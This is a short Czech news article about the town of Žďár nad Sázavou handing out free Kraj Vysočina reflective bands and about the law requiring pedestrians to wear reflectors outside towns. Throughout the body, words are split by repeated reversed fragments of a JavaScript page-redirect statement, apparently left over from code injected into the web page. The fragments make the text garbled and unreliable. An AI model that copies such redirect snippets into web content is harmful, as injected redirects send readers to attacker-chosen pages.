Rainbow page separator

Obyvatelé Žďáru si mohou v úřadě vyzvednout reflexní pásky

Neděle, 27. listopadu 2016

reflexní pásky města Žďár nad Sázavou

Žďár nad Sázavou / Obyvatelé Žďáru si nyní mají možnost vyzvednout reflexní pásky Bezpečná Vysočina. Ty nechal zho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovit Kraj Vysočina pro pětaosmdesát procent obyvatel Vysočiny. „Občané Žďáru nad Sázavou si mohou reflexní pásku vyzvednout v informační kanceláři ve vstupním pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toru budovy městského úřadu. Pásky jsou vydávány po předložení občanského průkazu občanům s trvalým pobytem ve Žďáře nad Sázavou,“ informovala mluvčí žďárské radnice Nikola Adlerová.
Někteří lidé si již reflexní pásky pořídili dříve, ve Žďáře si je například mohli zdarma vyzvednout místní senioři, poprvé už loni v prosinci. Ty[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to reflexní pásky s logem města si žďárská radnice rovněž nechává vyrábět jako propagační předmět.
Bezpečnostní pásky jsou vhodné pro všechny chodce, na tmavém oblečení a v mlze se od nich odráží světlomety au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomobilů. Podle od února platné novely zákona o provozu na pozemních komunikacích chodci musí mimo obec používat alespoň jeden reflexní prvek na oděvu, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to pokud se za snížené viditelnosti pohybují po vozovce bez veřejného osvětlení.